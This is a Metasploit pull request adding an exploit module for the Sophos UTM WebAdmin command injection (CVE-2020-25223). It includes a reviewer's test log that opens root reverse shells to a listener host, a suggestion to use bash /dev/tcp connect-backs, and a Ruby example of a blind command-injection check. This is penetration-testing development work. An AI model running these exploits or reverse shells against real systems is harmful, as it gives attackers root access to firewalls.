
Add Sophos UTM CVE-2020-25223 exploit #15783

Merged: 9 commits merged into rapid7:master from the feature/sophos branch, Oct 28, 2021

Conversation

wvu (Contributor) commented Oct 20, 2021

msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > info

       Name: Sophos UTM WebAdmin SID Command Injection
     Module: exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-18

Provided by:
  Justin Kennedy
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      4444             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an SID-based command injection in Sophos UTM's
  WebAdmin interface to execute shell commands as the root user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-25223
  https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
  https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
  https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a

msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) >

@wvu wvu added the module label Oct 20, 2021
@wvu wvu force-pushed the feature/sophos branch 14 times, most recently from 92a0a28 to 9cc453c, October 21, 2021 05:28
@wvu wvu added the docs label Oct 21, 2021
@wvu wvu changed the title [WIP] Add Sophos UTM CVE-2020-25223 exploit Add Sophos UTM CVE-2020-25223 exploit Oct 21, 2021
@wvu wvu marked this pull request as ready for review October 21, 2021 05:59
@wvu wvu force-pushed the feature/sophos branch 4 times, most recently from c5bb2f3 to 980c7f7, October 21, 2021 06:54
darrenmartyn (Contributor) commented
In testing I found the bash /dev/tcp method was the most reliable way to get a connect back: see https://github.com/darrenmartyn/sophucked/blob/main/sophucked.py

Might be worth supporting that in the module?

wvu (Contributor, Author) commented Oct 21, 2021

@darrenmartyn: I wouldn't be surprised, but I'd rather fix the payload than every module where it applies. IOW, we have the support; it's Metasploit itself that's broken. There's also still cmd/unix/generic, so you can run any payload you want. #14490 is relevant.

Did you test a Perl reverse shell? The system is built on Perl. I selected the default payload based on that, but there's always room for improvement.

Update: #15875 should fix this issue.

smcintyre-r7 (Contributor) commented
Everything appears to be working correctly. I tested the check method against a vulnerable and patched instance as well as multiple payloads.

Testing Output
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > show options 

Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.203  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      4444             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.159.128:443 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/reverse_python (Unix Command)
[*] Command shell session 3 opened (192.168.159.128:443 -> 192.168.159.203:58668 ) at 2021-10-25 16:03:48 -0400

id
uid=0(root) gid=0(root) groups=0(root)
ls
Upgrade
certs
confd-qrunner.pid
confd.plx
config.pm
dev
etc
master.pid
queuer.pid
res
var
which python
/usr/bin/python
^C
Abort session 3? [y/N]  y

[*] 192.168.159.203 - Command shell session 3 closed.  Reason: User exit
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/generic 
PAYLOAD => cmd/unix/generic
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set CMD touch /tmp/spencer_was_here
CMD => touch /tmp/spencer_was_here
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/generic (Unix Command)
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/reverse_p
set PAYLOAD cmd/unix/reverse_perl        set PAYLOAD cmd/unix/reverse_perl_ssl    set PAYLOAD cmd/unix/reverse_php_ssl     set PAYLOAD cmd/unix/reverse_python      set PAYLOAD cmd/unix/reverse_python_ssl  
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.159.128:443 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing cmd/unix/reverse_perl (Unix Command)
[*] Command shell session 4 opened (192.168.159.128:443 -> 192.168.159.203:58669 ) at 2021-10-25 16:10:09 -0400

id
uid=0(root) gid=0(root) groups=0(root)
uname -a 
Linux utm.home.lan 3.12.74-0.292688430.ga5ef2ae.rb5-smp64 #1 SMP Fri Jun 1 10:21:03 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
ls /tmp
host_cache.db
host_cache.db.lock
pdk-httpproxy
pdk-root
postgres.log
reverse_dns.db
reverse_dns.db.lock
reversednsresolver.log
spencer_was_here
up2date_auth_failure
vmware-root
^C
Abort session 4? [y/N]  y

[*] 192.168.159.203 - Command shell session 4 closed.  Reason: User exit
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set RHOSTS 192.168.159.201
RHOSTS => 192.168.159.201
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > check
[*] 192.168.159.201:4444 - The target is not exploitable. Failed to test command injection.
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) >
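
The testing output above shows the module's `check` returning "Successfully tested command injection" on the vulnerable host and "Failed to test command injection" on the patched one. The Ruby below is an added illustration of the general marker-echo technique behind that kind of check; it is not the module's code, does not model Sophos UTM or the SID parameter, and uses a constructed `FakeTarget` in place of a real HTTP endpoint. The one design point worth seeing is the split marker: the token searched for in the response never appears verbatim in the request, so a page that merely reflects its input cannot produce a false positive.

```ruby
# Added example: a marker-based blind command-injection check in the style of
# a Metasploit `check` method. NOT the module's code; the target is a
# constructed simulation, not Sophos UTM.
require 'securerandom'
require 'open3'

# Constructed stand-in for an HTTP endpoint.
#   vulnerable: true  -> the parameter is handed to /bin/sh (the flaw we probe)
#   reflecting: true  -> patched, but the response echoes the raw parameter
#   neither           -> patched, parameter validated and not reflected
class FakeTarget
  def initialize(vulnerable: false, reflecting: false)
    @vulnerable = vulnerable
    @reflecting = reflecting
  end

  # Returns the simulated response body for a request carrying `param`.
  def request(param)
    if @vulnerable
      out, _status = Open3.capture2('/bin/sh', '-c', "echo #{param}")
      "OK\n#{out}"
    elsif @reflecting
      "OK\nparam=#{param}\n"
    else
      param.match?(/\A[A-Za-z0-9]+\z/) ? "OK\n" : "ERROR invalid parameter\n"
    end
  end
end

# Builds the probe: two random halves that the injected printf joins on the
# target. The joined token is what we look for; the request only ever
# contains the halves separated by a space.
def build_probe
  left  = SecureRandom.hex(4)   # 8 hex chars
  right = SecureRandom.hex(4)   # 8 hex chars
  injection = "x; printf '%s%s' #{left} #{right}"
  [injection, left + right]
end

# Returns :vulnerable if the joined marker comes back, :safe otherwise.
# A reflected request contains "left right" (with the space), never the
# concatenation, so reflection alone cannot trip the check.
def check_cmd_injection(target)
  injection, marker = build_probe
  body = target.request(injection)
  body.include?(marker) ? :vulnerable : :safe
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable host: #{check_cmd_injection(FakeTarget.new(vulnerable: true))}"
  puts "reflecting host: #{check_cmd_injection(FakeTarget.new(reflecting: true))}"
  puts "patched host:    #{check_cmd_injection(FakeTarget.new)}"
end
```

Running the file prints `:vulnerable` for the simulated injectable host and `:safe` for both patched variants. A real `check` would also want a timeout and a distinct `:unknown` result for a host that does not answer at all, so that a network failure is not reported as "not exploitable".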

wvu (Contributor, Author) commented Oct 25, 2021

I'll be adding additional documentation as per @smcintyre-r7's suggestion. Thanks.

@wvu wvu force-pushed the feature/sophos branch 2 times, most recently from a0ae41e to 32da15f, October 27, 2021 23:45
wvu (Contributor, Author) commented Oct 28, 2021

@smcintyre-r7, cleared to land runway master. 🛩️

@smcintyre-r7 smcintyre-r7 merged commit 1ca9f48 into rapid7:master Oct 28, 2021
smcintyre-r7 (Contributor) commented

Release Notes

This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the root user.

@wvu wvu deleted the feature/sophos branch October 28, 2021 15:31
@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 29, 2021
wvu (Contributor, Author) commented Nov 15, 2021

See rapid7/rex-core#17.
